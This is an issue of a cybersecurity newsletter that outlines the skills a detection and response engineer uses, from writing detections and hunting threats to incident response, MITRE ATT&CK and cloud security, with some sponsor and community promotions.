The Skill Stack of a Detection & Response Engineer
Cybersec Café #92 - 05/26/26
The Skill Stack of a Detection & Response Engineer
In six years working in cybersecurity, I’ve never been asked to hack a website.
That’s not the work.
My specialization is detection and response - and almost nobody talks about what it actually involves day to day.
Most cybersecurity news and content is built around offensive security: hack the box, find the flag, ship the writeup. That’s because that’s the type of security that sells, that grabs your attention and instills this notion of fear.
But a majority of cybersecurity jobs don’t look like that.
Here’s the actual skill stack I use as a detection & response engineer. Each one is a real lane of work with its own day-to-day tasks, but they all crossover with each other in one way or another.
- Today’s Sponsor -
Reading about detection engineering won't make you a detection engineer. Doing the work will - writing the detection, triaging the alert, leading the incident, running the hunt.
That's what Defend the Org is built for. Hands-on labs designed by blue teamers around the exact skills mapped out above. Real scenarios. Real data. Real defenders.
Whether you're pivoting into cybersecurity, landing your first role, or upskilling up in your current one - DTO is where you get reps in.
33% off Launch Sale ends in 1 week!
Detection Engineering
Detection engineering is the work of writing the rules that catch attackers in your environment.
Every alert that fires in a SOC came from a detection somebody wrote - and this is a fundamental part of the role (it’s literally in the name).
The task is to understand how attackers behave - the commands they run, the files they touch, the actions they’d make when acting maliciously - and translate that behavior into a query that runs continuously against your log data, extracting this activity as it happens in near real-time.
In practice that means reading threat intel reports and turning them into detections, writing queries against telemetry from EDR, cloud platforms, identity providers, and network sensors.
Tuning rules so they catch the bad without paging the on-call for every benign admin action.
And unit-testing detections against known malicious samples before shipping them to production.
It’s writing code to stop the worst day of your company’s life before it happens.
Data Analytics
The single most leveraged skill in modern detection & response. Every other skill on this list touches data in one aspect or another.
Modern security platforms are running data lakes - Snowflake, BigQuery, Databricks, Athena. Your detections, your hunts, your dashboards. They all rely on turning big data into a story you can act on.
If you understand how to analyze data and can write a tight query against three joined tables of telemetry, you can do this job. If you can’t, you’ll spend your career waiting on people who can.
Day to day this looks like writing detection logic against authentication, process, network, and cloud audit logs, joining EDR telemetry against identity data to scope blast radius during an incident, pulling 90-day windows out of a multi-trillion-row warehouse without getting killed by the optimizer, and building the metrics that prove your team is working and improving.
Data analysis is the skill where the gap between “can technically write a SELECT statement” and “can answer hard questions fast under pressure” is the widest.
Closing that gap is an integral part of this job.
Programming
Programming is the glue between engineering and operations. Every team I’ve been on has had tooling that relies on scripting in some form, or custom tooling that requires maintenance and upkeep.
No matter what everyone tells you - cybersecurity engineers are required to understand programming fundamentals, especially in DnR.
Python is the friendliest to learn and has the largest potential impact if you’re just starting out.
Day to day often looks like writing scripts to parse data, building enrichment pipelines, automating the boring parts of incident response, and even writing detection-as-code depending on your SIEM.
You don’t need to be a fully fledged software engineer. But you do need to be the professional who can throw together a hacky solution when under the gun.
Threat Hunting
Threat Hunting is like Detection Engineering’s free-form cousin. Detections fire on behavior you’ve already defined, hunting is what you do when you suspect there’s behavior you haven’t defined yet.
Hunters often start with a hypothesis - “if an attacker were living off the land in our M365 tenant, what would that look like in our sign-in logs?”
Then its up to the hunter to go pull the data and see if the signal is there. Sometimes the hunt finds active compromise. More often you end up reasoning and finding a gap in your detection coverage, which becomes the next detection you write.
To be a great hunter, you need the strong mind of a data analyst, the technical skills to iterate on queries quickly, the mind of an attacker to embody what a malicious actor would do, and the perspective of a defender to understand how to catch a threat actor.
Hunting is the skill that allows you to continue to bolster your defenses aganst the attackers you haven’t seen yet.
Incident Response
When all your defenses fail, this is what happens.
A real incident has phases - identify what’s happening, contain the blast radius, eradicate the threat from the environment, and recover the affected systems.
Each phase requires a different set of brain muscles.
Containment is about cutting the attacker off without spooking them into burning your environment.
Eradication is about being really sure that you got everything.
Recovery is about restoring service without restoring the foothold.
And security engineers in detection and response are expected to fill the different pieces of this operational workflow - anywhere from incident commander to an individual contributor.
Leading an incident often means coordinating cross functionally with many teams:
Engineering when it involves the product
Legal when an incident escalates
Account executives when it involves a customer
While the goal is to not get popped - the reality is, you will. And when you do, you’re not running the response alone.
IR is the highest-stakes lane on this list. The clock is always running.
What is Detection & Response?
The Cybersec Café is now more than just a newsletter. I started creating content on YouTube, TikTok, and Instagram.
Security Operations
Detection engineering writes the rules. Security Operations is the skill that lives in their output.
Security Operations is the operational muscle of cybersecurity - the people in the queue, on the rotation, dispositioning alerts as they come in. Every detection you write eventually fires on somebody’s shift, and that somebody is a Security Operations engineer or analyst making the call: is this real, is this benign, do we escalate.
Day to day this looks like triaging alerts coming out of the SIEM, running playbooks against the ones that turn out to be real, escalating to incident response when scope grows, feeding false positives back to detection engineering for tuning, and owning the on-call rotation that keeps the lights on 24/7.
Security Operations is the dsicipline where most cybersecurity careers start, and where most of them stay. It’s also the lane that hands every other skill on this list its feedback loop - if your detections are noisy, Security Operations tells you. If your hunts produce nothing useful, Security Operations tells you. If your IR playbooks fall apart under pressure, Security Operations is where you find out.
MITRE ATT&CK
MITRE ATT&CK is the framework that functions as a shared language defenders use to talk about attacker behavior. Without it, every team would be reinventing their own taxonomy for “the bad guy did X.”
The framework is a structured catalog broken into tactics (the why) and techniques (the how) attackers use.
A detection isn’t really shippable until it’s mapped to a technique.
A threat intel report isn’t really actionable until you’ve extracted the techniques it describes.
A coverage gap in your detection program isn’t really visible until you’ve laid your detections against the matrix.
Think of it like the periodic table of cybersecurity.
Code Review
Cybersecurity engineers review code constantly.
Some of it is friendly code: detection-as-code PRs from teammates, internal tooling, automation scripts - with the main job being to make sure the logic matches the intent, the tests cover the failure modes, and the rule won’t drown the on-call when it ships.
Some of it is hostile code: PowerShell payloads pulled off a compromised endpoint, obfuscated JavaScript dropped by a phishing landing page, malware samples extracted from a sandbox.
And the reality is that it won’t always be in a programming language that you know how to write.
But part of the skill is understanding logic, reasoning on syntax, and figuring out exactly how it fits into the bigger picture.
Join a growing community of cybersecurity professionals who are serious about leveling up. Connect, collaborate, and grow your skills with others on the same journey. Engage in real-world security discussions and live events (coming soon!).
This is where the next generation of defenders can connect. Join for free below.
Cloud Security
The way we think about perimeter is fundamentally different than it was 10-15 years ago. The thing you used to defend with a firewall is now a policy written in terraform or another configuration language.
The cloud attack surface looks different than the traditional on-premise network - stolen access keys, OIDC token abuse, role chaining, over-privileged service accounts, exposed metadata endpoints.
And the telemetry looks different - CloudTrail, GCP audit logs, Azure activity logs, are the language we have to learn how to speak (and again, ties back to data analysis).
You may find yourself writing detections against or hunting through cloud audit logs, reviewing IAM policies and trust relationships for over-privilege, responding to an incident siloed to the cloud, and building telemetry pipelines to ingest audit logs to your SIEM.
Every defender on the planet is becoming a cloud defender, whether they wanted to or not.
Software Engineering & System Design
The difference between scripting and engineering is durability. A script is extremely limited in scope.
Real, enterprise-grade software gets written, deployed, tested, verisoned, and maintained.
It starts with secure system architecture. You may find yourself designing systems from scratch, or reviewing systems from a security perspective before they get built - the services, data flows, trust boundaries, integrations.
Software engineering is more than just coding - it’s reasoning about how systems can break, how they scale, and how they become maintainable.
Detection & Incident Response teams function more like a traditional software engineering team than you might think, with the tools, processes, and deployment pipelines that have become a staple of security engineering.
Most security teams underinvest in this skill. But the best DnR engineers are system thinkers first, and especially in today’s AI age - programmers second.
The Truth about Detection & Response
If you’re not deep in the weeds of security engineering, especially Detection & Response - it may be hard to believe just how adjacent it is to so many other disciplines.
That’s because both engineering and operational efforts tie so closely to the entire environment because every organization needs visibility over their systems, and a team ready to respond in the case of a security incident.
But don’t let that scare you. When people say Detection & Response isn’t an entry-level job, they’re not lying. It’s tough to get into off the jump because of how much knowledge you need across the entire stack of an organization.
What matters is understanding the pieces that go into becoming a detection & response engineer, and putting in the work to develop your skill set to get there.
Securely Yours,
Ryan G. Cox
P.S. The Cybersec Cafe delivers Deep Dives on a cybersecurity topic designed to sharpen your perspective, strengthen your technical edge, and support your growth as a professional - straight to your inbox.
. . .
For more insights and updates between issues, you can always find me on Twitter/X, Instagram, TikTok, YouTube, or my Website. Let’s keep learning, sharing, and leveling up together.